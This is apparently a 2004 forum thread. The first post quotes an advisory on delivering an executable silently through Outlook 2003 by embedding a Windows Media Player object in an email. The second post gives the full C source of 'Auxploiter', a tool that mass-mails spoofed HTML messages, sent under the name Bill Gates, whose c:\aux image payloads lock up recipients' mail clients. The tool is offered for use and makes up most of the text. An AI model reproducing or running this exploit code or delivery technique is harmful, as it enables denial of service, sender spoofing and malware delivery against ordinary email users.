Full Version: Outlook 2003
qcred11
QUOTE


Monday, May 17, 2004

Technical final step to 'silent delivery and installation of an
executable on the target computer, no client input other than
reading an email': this can be achieved with the highly
touted 'secure-by-default' Outlook 2003 mail client from the
craftsman known as 'Microsoft'.

Default settings of the 'gadget' are: restricted zone which
means no active x controls, no scripting, no file downloads etc.

This can all very easily be bypassed by simply embedding in a
rich text message our OLE object, one Windows Media Player. We
then point our source url to our media file which includes our
now run-of-the-mill 0s url flip and simply by previewing or
opening the email message invoke our device known as Internet
Explorer to proxy our manipulation of the recipient's machine.

In typical fashion despite the settings in the Windows Media
Player being set to 'disallow' scripting in media files, despite
Outlook 2003's 'highly' secure default setting of view html
content in the so-called 'restricted zone'; it all still works !

[screen shot: http://www.malware.com/rockitman.png 46KB]

This now all automates our process and coupling it with our
previous first step finding:

[http://www.securityfocus.com/bid/10307]

all we need to do next is our second step and embed the entire
package including the media file into the mail message and send
it along its merry way.

The whole Outlook 2003 'gadget' is broken.

Working Example:

Simply view the mail message:

http://www.malware.com/rockIT.zip

Notes:

1. Miserable selection of full screen = true can allow us to run
our 'video' in WMP full screen mode. How about that: forget
about html spam messages, now we have full screen video
advertisements on opening the mail message.
2. Tested on XP, 2K3 POP mail client settings Outlook 2003,
Exchange Server settings unknown at this time
3. Subject to initial WMP settings a notification of connection
settings can pop up, however generally dismissed at first
running of WMP along with neither yes nor no selection having an
effect [as usual].
4. Firewalls should flag Outlook itself trying to escape out on
port 80. Nevertheless if all embedded no need for remote hosting.
5. Disable HTML settings or get another mail client [better of
the two as below]



KillerLoo
################################################################################
##                         Teolupus Auxploiter v1.0                           ##
################################################################################

- What is it?
  Auxploiter is a remote exploitation tool for the c:\aux vulnerability, able
  to completely lock the user's mail client.

- How does it work?
  It works by sending an HTML e-mail message with <img src="file://c:/aux"> and
  <img src="file://c:/con/con">. Outlook and other mail clients read this
  message using Internet Explorer, which is touchy to the vulnerability.

- Who is vulnerable?
  This is something that I don't know exactly. I've tested it against Windows
  XP and it has worked. I suppose that it works with older versions too, and it
  would be great to receive user messages talking about their own experiences.

- How to compile it?
  Classical "./configure && make". You can use "make install" but make sure to
  copy auxploit.msg to somewhere and use it with the -b option.

- How to use it?
  ./auxploit -S smtp.server { -t to.email | -T to.email.list } [ options ]
  Additional options are:
    -D  Debug mode (useful to know what is happening)
    -f  From email
    -F  From name
    -s  Subject
    -d  Date (dd/mm/yyyy)
    -b  Alternate message body

- How can I contribute?
  First of all, bug reports. If you think that something is wrong, please talk
  to me. You can find my e-mail at the end of this file.
  The next step is to add support for SMTP authentication. I'm very busy and
  don't have time to do it now. Maybe someday I'll find some time to do it, or
  maybe a very happy user could do it and send it back to me.

- How can I talk to you?
  Feel free to send me messages at "teolupus@speedmax.com.br".

--------------------------------------------------------------------------------
Very soon I'll keep a security related site at:
http://www.brainsystems.com.br/security/

/***************************************************************************
 * Copyright (C) 2004 by Teolupus                                          *
 * teolupus@speedmax.com.br                                                *
 *                                                                         *
 * This program is free software; you can redistribute it and/or modify    *
 * it under the terms of the GNU General Public License as published by    *
 * the Free Software Foundation; either version 2 of the License, or       *
 * (at your option) any later version.                                     *
 ***************************************************************************/

#ifdef HAVE_CONFIG_H
#include <config.h>
#endif

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <getopt.h>
#include <errno.h>
#include <time.h>

#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define PORT_SMTP 25   /* SMTP port */
#define MAXBUF 1024    /* Max buffer size */

char buffer[MAXBUF];
int sockfd, debug = 0;

void show_help(void) {
    /* adjacent string literals: a C string literal cannot span lines */
    printf("\n"
           "Teolupus Auxploiter v1.0\n"
           "Usage: auxploit -S smtp.server { -t to.email | -T to.file.list } [ options ]\n"
           "\n"
           "-D: Set debug mode\n"
           "-h: Help\n"
           "\n"
           "-f: From e-mail\n"
           "-F: From name\n"
           "-t: To e-mail\n"
           "-T: To e-mail file (File with e-mail list)\n"
           "-s: Subject\n"
           "-d: Date (dd/mm/yyyy)\n"
           "-b: Alternate message body\n"
           "\n"
           "-S: SMTP Server IP\n"
           "\n"
           "If the server requires authentication:\n"
           "(Not implemented yet!)\n"
           "-u: User\n"
           "-p: Password\n"
           "\n");
}

/* Send an arbitrary NUL-terminated string (not limited to MAXBUF) */
void send_str(const char *s) {
    if (debug != 0) printf("-> %s", s);
    send(sockfd, s, strlen(s), 0);
}

/* Send the contents of the global buffer */
void send_m(void) {
    send_str(buffer);
}

/* Read one server reply into the global buffer */
void read_m(void) {
    int bytes_read;
    bzero(buffer, MAXBUF);
    /* leave one byte free so the reply is always NUL-terminated */
    bytes_read = recv(sockfd, buffer, MAXBUF - 1, 0);
    if (bytes_read > 0 && debug != 0) printf("%s", buffer);
}

void connect_to_server(char *server_ip) {
    struct sockaddr_in dest;

    // Open socket for streaming
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("Socket");
        exit(errno);
    }

    // Initialize server address/port struct
    bzero(&dest, sizeof(dest));
    dest.sin_family = AF_INET;
    dest.sin_port = htons(PORT_SMTP);
    if (inet_aton(server_ip, &dest.sin_addr) == 0) {
        fprintf(stderr, "%s: not a valid IPv4 address\n", server_ip);
        exit(1);
    }

    // Connect to server
    if (connect(sockfd, (struct sockaddr *)&dest, sizeof(dest)) != 0) {
        perror("Connect ");
        exit(errno);
    }

    // Get server banner
    read_m();

    // Send helo (SMTP command lines end in CRLF)
    snprintf(buffer, MAXBUF, "EHLO localhost.localdomain\r\n");
    send_m();

    // Read server answer
    read_m();
}

int send_mail(char *from, char *to, char *body_h, char *body) {
    snprintf(buffer, MAXBUF, "MAIL FROM: <%s>\r\n", from);
    send_m();
    read_m();

    snprintf(buffer, MAXBUF, "RCPT TO: <%s>\r\n", to);
    send_m();
    read_m();

    snprintf(buffer, MAXBUF, "DATA\r\n");
    send_m();
    read_m();

    /* headers and body may be longer than MAXBUF, so send them directly */
    send_str(body_h);
    send_str(body);

    /* end of data: a lone "." on its own line */
    snprintf(buffer, MAXBUF, "\r\n.\r\n");
    send_m();
    read_m();

    return 0;
}

void disconnect_from_server(void) {
    snprintf(buffer, MAXBUF, "QUIT\r\n");
    send_m();
    read_m();
    close(sockfd);
}

/* Read a whole file into a freshly allocated, NUL-terminated string */
char *read_file(char *file) {
    FILE *fp;
    char *buf;
    long fsize;
    size_t n;

    if ((fp = fopen(file, "r")) == NULL) {
        printf("Error: Could not open %s file\n", file);
        exit(1);
    }
    fseek(fp, 0, SEEK_END);
    fsize = ftell(fp);
    rewind(fp);
    if (fsize < 0 || (buf = calloc((size_t)fsize + 1, sizeof(char))) == NULL) abort();
    n = fread(buf, 1, (size_t)fsize, fp);
    buf[n] = '\0';
    fclose(fp);
    return buf;
}

int main(int argc, char *argv[]) {
    int a;
    char *current_target = NULL,
         *target_mail = NULL,
         *date = NULL,
         *subject = NULL,
         *sender_mail = NULL,
         *sender_name = NULL,
         *server_ip = NULL,
         *user = NULL,
         *password = NULL,
         *body_header = NULL,
         *body = NULL;

    unsigned int i = 0, j = 0, k = 0, num_of_targets = 0, biggest_target = 0;

    struct tm *ltime;
    time_t t;
    char time_str[50], temp[50];

    char months[12][4] = { "Jan", "Feb", "Mar", "Apr", "May", "Jun",
                           "Jul", "Aug", "Sep", "Oct", "Nov", "Dec" };

    // Parse args (getopt returns -1, not EOF, when the options are exhausted)
    while ((a = getopt(argc, argv, "f:F:t:T:s:d:b:S:u:p:hD")) != -1) {
        switch (a) {
        case 'D': // set debug flag
            debug = 1;
            break;

        case 'h': // help
            show_help();
            exit(0);

        case 'f': // sender e-mail
            if ((sender_mail = malloc(strlen(optarg) + 1)) == NULL) abort();
            strcpy(sender_mail, optarg);
            break;

        case 'F': // sender name
            if ((sender_name = malloc(strlen(optarg) + 1)) == NULL) abort();
            strcpy(sender_name, optarg);
            break;

        case 't': // target e-mail (single target)
            if (num_of_targets != 0) {
                printf("Error: Invalid double target specification\n");
                exit(1);
            }
            num_of_targets = 1;
            biggest_target = strlen(optarg);
            /* +2: room for the appended '\n' and the terminating NUL */
            if ((target_mail = malloc(strlen(optarg) + 2)) == NULL) abort();
            sprintf(target_mail, "%s\n", optarg);
            break;

        case 'T': // pick mails from file (multiple targets, one per line)
            if (num_of_targets != 0) {
                printf("Error: Invalid double target specification\n");
                exit(1);
            }
            target_mail = read_file(optarg);
            for (i = 0, j = 0; i <= strlen(target_mail); i++) {
                if (target_mail[i] == '\n' || target_mail[i] == '\0') {
                    /* count every newline-terminated line, plus a final
                       unterminated one if it is not empty */
                    if (j > 0 || target_mail[i] == '\n') num_of_targets++;
                    if (j > biggest_target) biggest_target = j;
                    j = 0;
                } else {
                    j++;
                }
            }
            break;

        case 's': // email subject
            if ((subject = malloc(strlen(optarg) + 1)) == NULL) abort();
            strcpy(subject, optarg);
            break;

        case 'd': // email date (dd/mm/yyyy)
            if ((date = malloc(strlen(optarg) + 1)) == NULL) abort();
            strcpy(date, optarg);
            break;

        case 'b': // use alternate body (do you know what you are doing?)
            body = read_file(optarg);
            break;

        case 'S': // smtp server ip
            if ((server_ip = malloc(strlen(optarg) + 1)) == NULL) abort();
            strcpy(server_ip, optarg);
            break;

        case 'u': // server requires authentication (not implemented)
            if ((user = malloc(strlen(optarg) + 1)) == NULL) abort();
            strcpy(user, optarg);
            break;

        case 'p': // server requires authentication (not implemented)
            if ((password = malloc(strlen(optarg) + 1)) == NULL) abort();
            strcpy(password, optarg);
            break;
        }
    }

    putchar('\n');

    printf("Welcome to Teolupus Auxploiter v1.0\n");
    if (server_ip == NULL) {
        printf("Error: -S server_ip is a necessary argument\n");
        show_help();
        exit(1);
    }
    if (num_of_targets == 0 || target_mail == NULL) {
        printf("Error: no target given (-t or -T)\n");
        show_help();
        exit(1);
    }

    printf("Relax while I Auxploit these %u e-mails\n", num_of_targets);

    if (body == NULL) body = read_file("auxploit.msg");
    printf("\nExploit Code:\n%s\n", body);

    if (subject == NULL) {
        if ((subject = malloc(20)) == NULL) abort();
        strcpy(subject, "You are Auxploited!");
    }

    if (sender_mail == NULL) {
        if ((sender_mail = malloc(24)) == NULL) abort();
        strcpy(sender_mail, "billgates@microsoft.com");
    }

    if (sender_name == NULL) {
        if ((sender_name = malloc(11)) == NULL) abort();
        strcpy(sender_name, "Bill Gates");
    }

    t = time(NULL);
    ltime = localtime(&t);
    if (date == NULL) {
        strftime(time_str, sizeof(time_str), "%a, %d %b %Y %H:%M:%S -0000", ltime);
    } else {
        int day, month;
        if (strlen(date) != 10 || date[2] != '/' || date[5] != '/') {
            printf("Error: date must be dd/mm/yyyy\n");
            exit(1);
        }
        day = atoi(date);        /* atoi stops at the '/' */
        month = atoi(date + 3);
        if (day < 1 || day > 31 || month < 1 || month > 12) {
            printf("Error: invalid day or month in %s\n", date);
            exit(1);
        }
        /* as in the original: weekday and time of day come from the clock,
           only day, month and year come from -d */
        strftime(temp, sizeof(temp), "%a", ltime);
        snprintf(time_str, sizeof(time_str), "%s, %02d %s %.4s ",
                 temp, day, months[month - 1], date + 6);
        strftime(temp, sizeof(temp), "%H:%M:%S -0000", ltime);
        strncat(time_str, temp, sizeof(time_str) - strlen(time_str) - 1);
    }

    putchar('\n');

    connect_to_server(server_ip);
    /* +1 for the terminating NUL */
    if ((current_target = calloc(biggest_target + 1, sizeof(char))) == NULL) abort();
    if ((body_header = calloc(MAXBUF, sizeof(char))) == NULL) abort();
    j = 0;
    for (i = 0; i < num_of_targets; i++) {
        /* copy the next line of the target list, dropping any '\r' */
        k = 0;
        while (target_mail[j] != '\n' && target_mail[j] != '\0') {
            if (target_mail[j] != '\r') current_target[k++] = target_mail[j];
            j++;
        }
        current_target[k] = '\0';
        if (target_mail[j] == '\n') j++;
        if (k == 0) continue;   /* empty line in the list */

        snprintf(body_header, MAXBUF,
                 "Message-ID: <12345678.12345678@microsoft.com>\r\n"
                 "Date: %s\r\n"
                 "From: %s <%s>\r\n"
                 "User-Agent: Auxploit by Teolupus\r\n"
                 "X-Accept-Language: en-us, en\r\n"
                 "MIME-Version: 1.0\r\n"
                 "To: %s\r\n"
                 "Subject: %s\r\n"
                 "Content-Type: text/html; charset=us-ascii\r\n"
                 "Content-Transfer-Encoding: 7bit\r\n"
                 "\r\n",
                 time_str, sender_name, sender_mail, current_target, subject);
        if (debug) printf("\n");
        printf("Sending -> %s\n", current_target);
        if (debug) printf("\n");
        send_mail(sender_mail, current_target, body_header, body);
    }
    disconnect_from_server();

    printf("\nFinished\n");
    printf("Thanks for using Teolupus Auxploiter\n\n");

    return EXIT_SUCCESS;
}

toska
........interesting. :)